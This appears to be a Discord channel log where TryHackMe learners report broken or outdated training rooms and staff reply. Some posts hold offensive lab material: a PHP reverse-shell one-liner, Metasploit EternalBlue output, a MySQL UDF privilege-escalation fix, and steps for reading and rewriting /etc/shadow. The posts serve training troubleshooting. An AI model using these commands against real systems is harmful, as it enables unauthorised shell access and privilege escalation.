Error: [*] Started reverse TCP handler on 10.10.169.26:4444 [*] 10.10.239.140:139 - Using auxiliary/scanner/smb/smb_ms17_010 as check [-] 10.10.239.140:139 - An SMB Login Error occurred while connecting to the IPC$ tree. [*] 10.10.239.140:139 - Scanned 1 of 1 hosts (100% complete) [-] 10.10.239.140:139 - The target is not vulnerable. [*] Exploit completed, but no session was created.

mild portal
#

very much a tiny thing, but on the wireshark101 room, task 13 (which is a neat pcap to analyze) mentions that you should open task11.pcap, and not task13.pcap

calm frigateBOT
#

Done!

robust turtle
feral jewel
#

The user flag appears to be missing from the RootMe box. Got root, but there's no user flag. Also I didn't try, but after looking at the passwd file and guessing the password for a user I realised that SSH could be brute forced super easy, not sure if this is intentional or not.

placid abyss
#

@dusky junco

calm frigateBOT
#

Done!

dusky junco
orchid torrent
dusky junco
#

ah I found it

#

updated the question ๐Ÿ™‚ thanks for reporting!

orchid torrent
#

Hey, you Can find it on enumerating smtp

dusky junco
#

yup yeah ๐Ÿ™‚ thanks! I've updated it

orchid torrent
#

Maybe it could be interesting to replace those Link with metasploit framework room

raw crypt
# raw crypt Just hit this same bug.

to add more context in this, in hope someone might look at it.
The accepted answer is: C:\agent\_work\112\s\Win32\Release\ZoomIt.pdb
However if you run the command .\strings.exe .\ZoomIt.exe| Select-String "\.pdb" on the attached VM you get: D:\a\1\s\Win32\Release\ZoomIt.pdb
I suspect the version of System Internal tools has been updated but the question has not...

jade viper
#

I think this room Lateral Movement and Pivoting might be broken on task 5 I find no authentication material for t1_toby other people seem to have the problem https://tryhackme.com/forum/thread/62b76d3b3de441004bce0467
For task 6, I can't xfreerdp but I can evil-winrm but I get some errors trying to execute commands, other people seems to have the problem.
Someone is trolling :
za\t2_felicia.dean@THMJMP2 C:\tools>dir
Volume in drive C has no label.
Volume Serial Number is F4B0-FCB9

Directory of C:\tools

02/27/2023 01:22 PM <DIR> .
02/27/2023 01:22 PM <DIR> ..
06/14/2022 08:27 PM 45,272 nc64.exe
04/19/2022 09:17 PM 1,078,672 PsExec64.exe
03/16/2022 05:19 PM 906,752 SharpHound.exe
06/19/2022 05:38 AM <DIR> socat
02/27/2023 01:02 PM 1,609 [0;3e4]-0-0-40a50000-THMJMP2$@DNS-thmdc.za.tryhackm
e.com.kirbi

pastel lark
mossy mortar
#

I cannot initialize my Linux machine in room Linux Fundamentals Part 1. Any help here?

quaint sparrow
#

Did you start the machine in task 1?

mossy mortar
#

Ye

#

Progress bar is on 17%

#

and not moving

quaint sparrow
#

Try hitting refresh

mossy mortar
#

DId it 3 times

eternal summit
mossy mortar
eternal summit
#

Where on the page?

#

!docs verify

tropic flameBOT
eternal summit
#

If you follow those steps, you will be able to send a screenshot here

quaint sparrow
#

I was able to boot up the machine ok.

mossy mortar
rugged canyon
# mossy mortar

that bar is for how many questions you have done of the room.... if you check a bit above that box there should be a blue show split view button that you can click to actually interact with the machine

mossy mortar
#

Im sorry

#

Stupid question actually

rugged canyon
calm frigateBOT
#

Done!

vivid drift
#

And the given shell in /cmd.php did not work, had to use this instead:
php -r '$sock=fsockopen("10.10.10.10",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

cyan hinge
rugged canyon
#

@raw bison โฌ†๏ธ

calm frigateBOT
#

Done!

rugged canyon
#

and thank you

calm frigateBOT
#

Done!

#

Done!

calm frigateBOT
#

Done!

dusky junco
#

thanks @vital vine

livid escarpBOT
#

Gave +1 Rep to @vital vine

split pawn
hazy tiger
#

@split pawn It would be appreciate if you could supply more details when reporting bugs ๐Ÿ™‚

split pawn
white arch
#

Hi guys, I'm on this room: Exploiting Active Directory, but it's been resetting for over 24 hrs, anybody know how to reopen the room?

carmine trellis
#

Hi all, I'm on the room: Breaching Active Directory but it's in resetting mode for different hours. Do you know hot to reset? Thanks

frail swan
rugged canyon
#

dunnos

woven vault
#

Room Exploiting Active Directory
Task 5
meterpreter>ps | grep "explorer"

Result:
meterpreter > ps | grep "explorer"
Filtering on 'explorer'
No matching processes were found.

we cannot continue our lab from there please check it

strong notch
#

Room Cross-site Scripting

#

Task 9

#

one of the image is not able to load

#

minor problem.

drifting kindle
#

Room Metasploit: Exploitation
Task 5
I some case post/linux/gather/hashdump with db connected would cause the below error.

[-] Post failed: ActiveRecord::RecordInvalid Validation failed: Session can't be blank

Need to db_disconnect before further process.

calm frigateBOT
#

Done!

calm frigateBOT
#

Done!

wheat fractal
wheat fractal
#

in room https://tryhackme.com/room/linprivesc task number 7, the SUID/SGID bin 'nano' isn't showing up as having its SUID/SGID set correctly. It can't be found with find / -type f -perm /6000 2>/dev/null and when I find using find / -type f -name 'nano' -ls 2>/dev/null it's not showing as having its SUID/SGID set correctly

#

upon attempting to read the /etc/shadow file with the as-setup nano bin it's giving a permission denied error that I would expect from not having the SUID/SGID set correctly

#

can't be found using the more limited command given either

#

I rebooted the room to verify my findings and I'm right, the bin isn't set correctly for this task

#

I would also recommend changing the perm from -04000 to /6000 to find BOTH SGID and SUID bins at the same time

wheat fractal
#

the room instructs you to read out the contents of shadow with nano though?

#

you read the contents of /etc/shadow then crack the hash and insert a new hash into the file

fast mantle
#

Operating System security lab in Introduction to Cybersecurity is messed up. It says password for johnny is within first 7 of most common passwords. It is not. 13th on the list i found. think guidance should be updated

#

im dumb as a bag of rocks and thats what i get for getting back into the path with a week in between

#

you are 100% right.

wheat fractal
#

wow, thanks

cobalt halo
#

Room bugs seems to be the most relevant to post this: The hint for key 2 on the Mr. robot room is irrelevant.

#

I understand something misleading within the machine to throw you down a rabbit hole, but this is just unnecessary.

craggy pulsar
#

https://tryhackme.com/room/linuxprivesc Task 2 "Service Exploits" The following command fails: mysql> create function do_system returns integer soname 'raptor_udf2.so';
ERROR 1126 (HY000): Can't open shared library 'raptor_udf2.so' (errno: 22 /usr/lib/mysql/plugin/raptor_udf2.so: file too short)
The "SELECT ... DUMPFILE" command did not copied the file into the plugins directory correctly. In order to make it work you have copy it manually: mysql> ! cp raptor_udf2.so /usr/lib/mysql/plugin/raptor_udf2.so
mysql> create function do_system returns integer soname 'raptor_udf2.so';
Query OK, 0 rows affected (0.00 sec)

jaunty python
#

https://tryhackme.com/room/networkservices

Task 3, questiom What operating system version is running?

after running enum4linux -a <MACHINE_IP> I get:

 ===================================( OS information on 10.10.34.18 )===================================
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            
[E] Can't get OS info with smbclient                                                                                                                                                                                        
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            
[+] Got OS info for 10.10.34.18 from srvinfo:                                                                                                                                                                               
Cannot connect to server.  Error was NT_STATUS_UNSUCCESSFUL                                                                                                                                                                 

Am I doing something wrong, or has the room got broken somehow?

jaunty python
tame cliff
#

Hello, I am having problems with this exercise. Only 6 of 7 blank spaces appear and I know I doing it right but it keeps saying I have the wrong answer

hazy tiger
tame cliff
#

I have been here for 3 hours NotLikeThis

#

What can I do? ๐Ÿ™‚

hazy tiger
tame cliff
#

I got it @hazy tiger

#

Thank you anyway

pastel lark
hazy tiger
pastel lark
#

Yeah, I did, they mention different (correct answer) for this particular question. Other answers are exactly the same as mine.

dusky junco
#

I have a sneaky suspicion that AWS have updated/changed the architecture of the machine/the type of architecture the machine deploys on has changed since the room was written

#

yes I think that is what has happened. The question needs to be updated. I think to prevent it in the future I could re-word the question to be something like "What is the name of the cloud provider in the BIOS version?"

#

I'll wait and see what Tim says before I update it because QA, but the answer is indeed outdated. The answer it is expecting is: Xen 4.2.amazon @pastel lark

pastel lark
#

Thx Ben, yeah, I figured it out from a write up. But thanks for explaining what is in behind the issue.

glad badger
#

Yeah, the instance-type was changed from t2 (xen) to t3a (nitro).
"instanceType" : "t3a.large"
t2 would show as Xen 4.2.amazon, t3a as nitro (amazon - 1)

polar moon
dusky junco
digital mural
#

I'm in the room breachingAD Task 4 and when I run the command:

sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart

I am receiving the following error:

ldap_sasl_interactive_bind_s: Can't contact LDAP server (-1)

Sorry if this isn't a bug, but user error.

cunning forum
devout geode
#

here under ftp enumeration

#

number of ports open are 1

#

the ans that it accepts is 2

granite nova
granite nova
rugged canyon
#

i.e it got removed for being old and not being up to new QA standards shadow thinks

heady rapids
#

In the room BreachingAD Task#4
Solution no longer works in the current version of Kali. slapd is on version slapd 2.5.13+dfsg-5.

$ ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms dn:

stoic mountain
#

https://tryhackme.com/room/windowsforensics1

I quote:
"In most cases, ControlSet001 will point to the Control Set that the machine booted with, and ControlSet002 will be the last known good configuration.

Question:
"Which ControlSet contains the last known good configuration?"

correct answer: "1"
But why am I blind or should not be 2 the correct answer?

granite nova
quaint sparrow
#

@hazy tiger

hazy tiger
#

Holy shit I almost banned you

quaint sparrow
#

๐Ÿ˜‚ ๐Ÿ˜‚ ๐Ÿ˜‚

calm frigateBOT
#

Done!

placid abyss
#

Wait...where did scrubz go

hazy tiger
#

They crashed the bot, bot said it couldn't find them

hazy tiger
quaint sparrow
#

Looool.

Room tester one minute, gone the next.

rugged canyon
white jewel
#

in the brim room, task 3: "Look at the details of the first NTP log that appear on the dashboard. What is the "duration" value?" isn't asking for the first value with respect to time, it is asking for the last one time wise or the one at the top of the list... not really a bug but took me a number of attempts to figure out...

safe ravine
lunar drum
quaint sparrow
rugged canyon
#

oh... not blaster

#

that was on shadows to do list

#

blue and ice were such a good part of that series shadow beted that blaster would be good too

livid escarpBOT
#

Gave +1 Rep to @rugged canyon

dark forge
#

Hi it seems like "throwback" room is restarting for a very long time

calm frigateBOT
#

Done!

cloud valve
#

Hello. The room "https://tryhackme.com/room/burpsuitebasics" task 7 is now out of date. Burp suite completely changed the options layout which makes the questions wrong. You can figure it out with the screenshots, but it could use updating. Is this the right place to mention it?

rugged canyon
#

yeah this is the right place

half breach
#

In the "Jupyter 101" room on "Task 2 - What is Jupyter?", the link (https[://]oldblog[.]cmnatic[.]co[.]uk/) to the "Read the support material here!" is no longer a valid link. The cmnatic[.]co[.]uk webserver is running. I did try to locate the content if it had been moved, but I could not find it.
Task 3 also has an outdated link.

rugged canyon
#

@dusky junco that is talking about your website and blog posts so yeah

dusky junco
#

hehe fair enough thanks for the ping

#

I'll take a look at this when I get a moment @half breach ๐Ÿ™‚ I think I just need to update the room to point to the correct URL. I'll let you know either way ๐Ÿ‘

dusky junco
#

tbh I think that room itself it needs an update. IIRC it's my first ever room on THM which would've been 3+ years. Won't get a chance to look at this weekend -- maybe next week:)

atomic lion
#

Error while downloading the database file - check your Internet connection (try to run it with --debug to see the full error message)

#

I was wondering why loki would not flag the 1ndex.php file

#

never mind had to scan the file2 directory

fervent finch
#

Hello everyone,

I'm hoping someone can tell me if I'm doing something wrong or if there is a problem/bug that needs to be fixed.

I'm doing the webenum1 room, task 6, question "There's another flag to be found in one of th virtual hosts! Find it!"

Up to this point I was doing OK but now when I do a "gobuster vhost -u http://webenum.thm -w /usr/shar/wordlists/seclists/Discovery/DNS/subdomain-top1million-5000.txt" it goes through the motions and lists a lot of "found" vhosts with a status of 400.
Found: 2008 Status: 400 [Size: 424]
Found: 25 Status: 400 [Size: 424]
Found: 15 Status: 400 [Size: 424]
Found: 5 Status: 400 [Size: 424]
Found: www.2 Status: 400 [Size: 424]

I struggled so long with this one, started and stopped and started the vpn connection to THM, machine, and room that I decided to check online on what th answer was (I don't like doing that) to see what I was doing wrong and it looks like I was doing everything correctly and there was an example of what I was supposed to find. I'm not finding the examples but I answer the previous question and it took. This current question is asking for a flag in one of those vhosts that I can't find but am supposed to see.

What am I doing incorrectly? any help would be appreciated.

#

OK, thanks, that gives me something to look up/go by...

fervent finch
#

so if in my scan/enumeration I find xxx.webenum.thm I should be able to go to my browser and type that url and see it right? I'm getting an error trying to get into the url/vhost address...

#

OK, sorry, thanks.... I'll try the host file and then move my ?'s to the room help...

sturdy grotto
#

In Wreath on task 21 and the Administrator hash I am seeing in the location indicated by the walkthrough is graded as incorrect. I found someone's walkthrough to see if the hash they got was different, and it is (I entered that hash to verify and it was correct). Is there a possibility the password somehow got modified? I have a screen grab of what I am seeing with mimikatz if needed.

#

Addition: just read far enough to see the pass-the-hash using Admin hash. I tried the "correct" (one that is marked correct) one and it had an authentication failure. I then tried the one I see in the hash dump and it works (which makes sense but I wanted to verify I wasn't losing my marbles). Looks like something happened to the password. If this should be in #wreath-network just let me know.

obsidian kiln
sturdy grotto
#

@obsidian kiln had a feeling ๐Ÿ˜•. Thanks!

livid escarpBOT
#

Gave +1 Rep to @obsidian kiln

cerulean sapphire
#

try adding an e to share @fervent finch

#

speaking of wreath. heres a typo about how to spell behavioral somewhere in the upper 30 tasks

eternal summit
#

Wreath, and indeed TryHackMe, were all created by people from the British Isles, where the spoken language is British English.
Behaviour is the British English spelling, behavior is the English (Simplified) spelling.

cerulean sapphire
#

i hate being wrong thank you!

obsidian kiln
#

Surprised you're not picking up "outwith" as well lmfao

terse brook
#

I raised a few bugs with @hazy tiger in chat feature on website. Let me know if he didn't get them๐Ÿ‘

clear birch
warm lake
#

Room - Linux Privilege Escalation
Link URL - https://tryhackme.com/room/linprivesc
Task - #7 Privilege Escalation: SUID
Error - find / -type f -perm -04000 -ls 2>/dev/null does not yield SUID bit on /bin/nano as described in task

rugged canyon
#

also known as this is not a bug but a feature and it is apparently confusing for a lot of people to use what they learnt in the task to find the actual vuln